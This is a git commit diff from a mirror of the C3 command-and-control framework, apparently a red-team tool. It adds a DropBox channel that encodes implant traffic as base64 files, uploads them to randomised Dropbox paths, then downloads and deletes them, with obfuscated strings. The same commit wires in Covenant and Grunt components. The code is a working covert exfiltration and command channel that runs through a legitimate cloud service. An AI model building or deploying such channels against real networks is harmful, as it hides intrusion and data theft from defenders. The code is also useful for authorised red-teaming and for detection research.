mirror of https://github.com/infosecn1nja/C3.git
DropBox Channel
parent
90feca454e
commit
a2967d739e
|
@ -14,6 +14,7 @@
|
|||
<ProjectCapability Include="SourceItemsFromImports" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="$(MSBuildThisFileDirectory)FSecure\C3\Interfaces\Channels\DropBox.cpp" />
|
||||
<ClCompile Include="$(MSBuildThisFileDirectory)FSecure\C3\Interfaces\Channels\Slack.cpp" />
|
||||
<ClCompile Include="$(MSBuildThisFileDirectory)FSecure\C3\Interfaces\Channels\UncShareFile.cpp" />
|
||||
<ClCompile Include="$(MSBuildThisFileDirectory)FSecure\C3\Interfaces\Connectors\MockServer.cpp" />
|
||||
|
@ -49,6 +50,7 @@
|
|||
<ClInclude Include="$(MSBuildThisFileDirectory)CppCodec\base32_default_crockford.hpp" />
|
||||
<ClInclude Include="$(MSBuildThisFileDirectory)CppCodec\base64_default_rfc4648.hpp" />
|
||||
<ClInclude Include="$(MSBuildThisFileDirectory)CppRestSdk\include\cpprest\http_client.h" />
|
||||
<ClInclude Include="$(MSBuildThisFileDirectory)FSecure\C3\Interfaces\Channels\DropBox.h" />
|
||||
<ClInclude Include="$(MSBuildThisFileDirectory)FSecure\CppTools\ByteConverter\ByteArray.h" />
|
||||
<ClInclude Include="$(MSBuildThisFileDirectory)FSecure\CppTools\ByteConverter\ByteConverter.h" />
|
||||
<ClInclude Include="$(MSBuildThisFileDirectory)FSecure\CppTools\ByteConverter\ByteVector.h" />
|
||||
|
|
|
@ -22,6 +22,11 @@
|
|||
<ClCompile Include="$(MSBuildThisFileDirectory)FSecure\WinTools\StructuredExceptionHandling.cpp" />
|
||||
<ClCompile Include="$(MSBuildThisFileDirectory)FSecure\WinTools\InjectionBuffer.cpp" />
|
||||
<ClCompile Include="$(MSBuildThisFileDirectory)FSecure\CppTools\Compression.cpp" />
|
||||
<ClCompile Include="$(MSBuildThisFileDirectory)FSecure\C3\Interfaces\Connectors\MockServer.cpp" />
|
||||
<ClCompile Include="$(MSBuildThisFileDirectory)FSecure\C3\Interfaces\Connectors\Covenant.cpp" />
|
||||
<ClCompile Include="$(MSBuildThisFileDirectory)FSecure\C3\Interfaces\Peripherals\Mock.cpp" />
|
||||
<ClCompile Include="$(MSBuildThisFileDirectory)FSecure\C3\Interfaces\Peripherals\Grunt.cpp" />
|
||||
<ClCompile Include="$(MSBuildThisFileDirectory)FSecure\C3\Interfaces\Channels\DropBox.cpp" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="$(MSBuildThisFileDirectory)CppCodec\base32_default_crockford.hpp" />
|
||||
|
@ -95,5 +100,8 @@
|
|||
<ClInclude Include="$(MSBuildThisFileDirectory)FSecure\WinHttp\HttpRequest.h" />
|
||||
<ClInclude Include="$(MSBuildThisFileDirectory)FSecure\WinHttp\Uri.h" />
|
||||
<ClInclude Include="$(MSBuildThisFileDirectory)FSecure\WinHttp\WebProxy.h" />
|
||||
<ClInclude Include="$(MSBuildThisFileDirectory)FSecure\C3\Interfaces\Peripherals\Grunt.h" />
|
||||
<ClInclude Include="$(MSBuildThisFileDirectory)FSecure\C3\Interfaces\Peripherals\Mock.h" />
|
||||
<ClInclude Include="$(MSBuildThisFileDirectory)FSecure\C3\Interfaces\Channels\DropBox.h" />
|
||||
</ItemGroup>
|
||||
</Project>
|
|
@ -1,8 +1,6 @@
|
|||
#include "StdAfx.h"
|
||||
#include <fstream>
|
||||
#include <filesystem>
|
||||
|
||||
#include <Common/CppRestSdk/include/cpprest/http_client.h>
|
||||
#include "Common/CppRestSdk/include/cpprest/http_client.h"
|
||||
#include "Common/FSecure/Crypto/Base64.h"
|
||||
#include "Common/CppRestSdk/include/cpprest/base_uri.h"
|
||||
|
||||
|
@ -19,19 +17,17 @@ namespace FSecure::C3::Interfaces::Channels
|
|||
, m_Directory( arguments.Read<std::string>() )
|
||||
, m_Token( arguments.Read<std::string>() )
|
||||
{
|
||||
//if (auto winProxy = WinTools::GetProxyConfiguration(); !winProxy.empty())
|
||||
// this->m_HttpConfig.set_proxy(winProxy == OBF(L"auto") ? web::web_proxy::use_auto_discovery : web::web_proxy(winProxy));
|
||||
|
||||
this->m_HttpConfig.set_proxy(web::web_proxy(L"http://192.168.0.18:8080"));
|
||||
this->m_HttpConfig.set_validate_certificates(false);
|
||||
if (auto winProxy = WinTools::GetProxyConfiguration(); !winProxy.empty())
|
||||
this->m_HttpConfig.set_proxy(winProxy == OBF(L"auto") ? web::web_proxy::use_auto_discovery : web::web_proxy(winProxy));
|
||||
|
||||
}
|
||||
|
||||
|
||||
// Make a HTTP POST Request
|
||||
std::string DropBox::SendHTTPRequest(std::string const& host, std::string const& contentType, std::string const& data)
|
||||
{
|
||||
while (true)
|
||||
{
|
||||
|
||||
web::http::client::http_client webClient(utility::conversions::to_string_t(host), this->m_HttpConfig);
|
||||
web::http::http_request request(web::http::methods::POST);
|
||||
|
||||
|
@ -56,12 +52,13 @@ namespace FSecure::C3::Interfaces::Channels
|
|||
else if (resp.status_code() == web::http::status_codes::TooManyRequests)
|
||||
std::this_thread::sleep_for(FSecure::Utils::GenerateRandomValue(10s, 20s));
|
||||
else if (resp.status_code() == web::http::status_code(409))
|
||||
{ }
|
||||
return "{}";
|
||||
else
|
||||
throw std::exception(OBF("[x] Non 200/429 HTTP Response\n"));
|
||||
throw std::exception(OBF("[x] Non 200/409/429 HTTP Response\n"));
|
||||
}
|
||||
}
|
||||
|
||||
// Make a HTTP POST Request and also edit the Headers.
|
||||
std::string DropBox::SendHTTPRequest(std::string const& host, json const& h_args, std::string const& contentType, std::string const& data)
|
||||
{
|
||||
while (true)
|
||||
|
@ -87,26 +84,32 @@ namespace FSecure::C3::Interfaces::Channels
|
|||
web::http::http_response resp = webClient.request(request).get();
|
||||
|
||||
if (resp.status_code() == web::http::status_codes::OK)
|
||||
return resp.extract_utf8string(true).get();
|
||||
{
|
||||
resp.headers().set_content_type(L"text/plain");
|
||||
return resp.extract_utf8string().get();
|
||||
}
|
||||
else if (resp.status_code() == web::http::status_codes::TooManyRequests)
|
||||
std::this_thread::sleep_for(FSecure::Utils::GenerateRandomValue(10s, 20s));
|
||||
else if (resp.status_code() == web::http::status_code(409))
|
||||
{ }
|
||||
return "{}";
|
||||
else
|
||||
throw std::exception(OBF("[x] Non 200/429 HTTP Response\n"));
|
||||
throw std::exception(OBF("[x] Non 200/409/429 HTTP Response\n"));
|
||||
}
|
||||
}
|
||||
|
||||
// Parse HTTP POST Response as JSON
|
||||
json DropBox::SendJsonRequest(std::string const& url, json const& data)
|
||||
{
|
||||
return json::parse(SendHTTPRequest(url, OBF("application/json"), data.dump()));
|
||||
}
|
||||
|
||||
// Parse HTTP POST(with edited headers) Respose as JSON
|
||||
json DropBox::SendJsonRequest(std::string const& url, json const& h_args, std::string data)
|
||||
{
|
||||
return json::parse(SendHTTPRequest(url, h_args, OBF("application/octet-stream"), data));
|
||||
}
|
||||
|
||||
// Send Packets to Channel
|
||||
size_t DropBox::OnSendToChannel(FSecure::ByteView packet)
|
||||
{
|
||||
|
||||
|
@ -122,15 +125,14 @@ namespace FSecure::C3::Interfaces::Channels
|
|||
{
|
||||
std::string base64 = cppcodec::base64_rfc4648::encode(packet.data(), packet.size());
|
||||
//Write to file on DropBox
|
||||
std::string url = OBF_STR("https://content.dropboxapi.com/2/files/upload");
|
||||
|
||||
json db_args;
|
||||
db_args[OBF("path")] = OBF("/") + m_Directory + OBF("/") + m_outFile;
|
||||
db_args[OBF("path")] = OBF("/") + m_Directory + m_outFile + "/" + m_outFile + std::to_string(FSecure::Utils::GenerateRandomValue<int>(10000, 99999));
|
||||
db_args[OBF("mode")] = OBF("add");
|
||||
db_args[OBF("autorename")] = true;
|
||||
db_args[OBF("mute")] = true;
|
||||
|
||||
SendJsonRequest(url, db_args, base64);
|
||||
SendJsonRequest(OBF_STR("https://content.dropboxapi.com/2/files/upload"), db_args, base64);
|
||||
bytesWritten = packet.length();
|
||||
}
|
||||
// if total packet size is larger than api file upload size
|
||||
|
@ -142,78 +144,55 @@ namespace FSecure::C3::Interfaces::Channels
|
|||
|
||||
b64packet = cppcodec::base64_rfc4648::encode(strpacket.data(), strpacket.size());
|
||||
|
||||
std::string url = OBF_STR("https://content.dropboxapi.com/2/files/upload");
|
||||
|
||||
json db_args;
|
||||
db_args[OBF("path")] = OBF("/") + m_Directory + OBF("/") + m_outFile;
|
||||
db_args[OBF("path")] = OBF("/") + m_Directory + m_outFile + "/" + m_outFile + std::to_string(FSecure::Utils::GenerateRandomValue<int>(10000, 99999));
|
||||
db_args[OBF("mode")] = OBF("add");
|
||||
db_args[OBF("autorename")] = true;
|
||||
db_args[OBF("mute")] = true;
|
||||
|
||||
SendJsonRequest(url, db_args, b64packet);
|
||||
SendJsonRequest(OBF_STR("https://content.dropboxapi.com/2/files/upload"), db_args, b64packet);
|
||||
bytesWritten = strpacket.size();
|
||||
|
||||
}
|
||||
return bytesWritten;
|
||||
}
|
||||
|
||||
std::vector<FSecure::ByteVector> DropBox::OnReceiveFromChannel()
|
||||
// Read Packets from Channel
|
||||
FSecure::ByteVector DropBox::OnReceiveFromChannel()
|
||||
{
|
||||
std::vector<ByteVector> ret;
|
||||
bool loop_again = false;
|
||||
|
||||
//list all files on DropBox
|
||||
std::string url = OBF_STR("https://api.dropboxapi.com/2/files/list_folder");
|
||||
FSecure::ByteVector packet;
|
||||
|
||||
// Check if there are packets to read
|
||||
json db_list;
|
||||
db_list[OBF("path")] = OBF("/") + m_Directory;
|
||||
db_list[OBF("path")] = OBF("/") + m_Directory + m_inFile;
|
||||
db_list[OBF("recursive")] = false;
|
||||
db_list[OBF("limit")] = 1;
|
||||
|
||||
json filelist = SendJsonRequest(url, db_list);
|
||||
std::cout << "No of files to read : " << filelist["entries"].size() << std::endl;
|
||||
do
|
||||
{
|
||||
|
||||
if (filelist["entries"].size() > 0)
|
||||
json filelist = SendJsonRequest(OBF_STR("https://api.dropboxapi.com/2/files/list_folder"), db_list);
|
||||
|
||||
|
||||
if (filelist["entries"][0].size())
|
||||
{
|
||||
for (int i = 0; i < filelist["entries"].size(); i++)
|
||||
{
|
||||
url = OBF_STR("https://content.dropboxapi.com/2/files/download");
|
||||
// Download packet from DropBox
|
||||
json db_args;
|
||||
db_args[OBF("path")] = filelist["entries"][i]["path_display"];
|
||||
std::cout << "Reading Files: " << filelist["entries"][i]["path_display"] << std::endl;
|
||||
db_args[OBF("path")] = filelist["entries"][0]["path_display"];
|
||||
std::string fileContent = SendHTTPRequest(OBF_STR("https://content.dropboxapi.com/2/files/download"), db_args, " text/plain; charset=utf-8", "");
|
||||
|
||||
std::string fileContent = SendHTTPRequest(url, db_args, " text/plain; charset=utf-8", "");
|
||||
if (!fileContent.empty())
|
||||
{
|
||||
// read packet from file
|
||||
auto relayContent = cppcodec::base64_rfc4648::decode(fileContent);
|
||||
// Read packet from file
|
||||
packet = cppcodec::base64_rfc4648::decode(fileContent);
|
||||
|
||||
//remove command from channel after completion
|
||||
url = OBF_STR("https://api.dropboxapi.com/2/files/delete_v2");
|
||||
// Remove packet from DropBox after read
|
||||
SendJsonRequest(OBF_STR("https://api.dropboxapi.com/2/files/delete_v2"), db_args);
|
||||
|
||||
SendJsonRequest(url, db_args);
|
||||
|
||||
ret.emplace_back(std::move(relayContent));
|
||||
}
|
||||
}
|
||||
}
|
||||
// check if there are more files on dropbox
|
||||
// if true, list more files
|
||||
loop_again = filelist["has_more"];
|
||||
if (loop_again)
|
||||
{
|
||||
std::string url = OBF_STR("https://api.dropboxapi.com/2/files/list_folder/continue");
|
||||
json db_list1;
|
||||
db_list1[OBF("cursor")] = filelist["cursor"];
|
||||
|
||||
filelist = SendJsonRequest(url, db_list1);
|
||||
}
|
||||
} while (loop_again);
|
||||
|
||||
|
||||
return ret;
|
||||
}
|
||||
|
||||
|
||||
return FSecure::ByteVector { packet };
|
||||
}
|
||||
|
||||
// Custom Command
|
||||
ByteVector DropBox::OnRunCommand(ByteView command)
|
||||
{
|
||||
auto commandCopy = command;
|
||||
|
@ -227,6 +206,7 @@ namespace FSecure::C3::Interfaces::Channels
|
|||
}
|
||||
}
|
||||
|
||||
// Clear all files from DropBox
|
||||
bool DropBox::Clear()
|
||||
{
|
||||
std::string url = OBF_STR("https://api.dropboxapi.com/2/files/delete_v2");
|
||||
|
|
|
@ -17,7 +17,7 @@ namespace FSecure::C3::Interfaces::Channels
|
|||
|
||||
/// Reads a single C3 packet from Channel. Periodically called by attached Relay. Implementation should read the data (or return an empty buffer if there's nothing in the Channel waiting to read) and leave as soon as possible.
|
||||
/// @return ByteVector that contains a single packet retrieved from Channel.
|
||||
std::vector<FSecure::ByteVector> OnReceiveFromChannel();
|
||||
FSecure::ByteVector OnReceiveFromChannel();
|
||||
|
||||
|
||||
/// Describes Channels creation parameters and custom Commands.
|
||||
|
|
Loading…
Reference in New Issue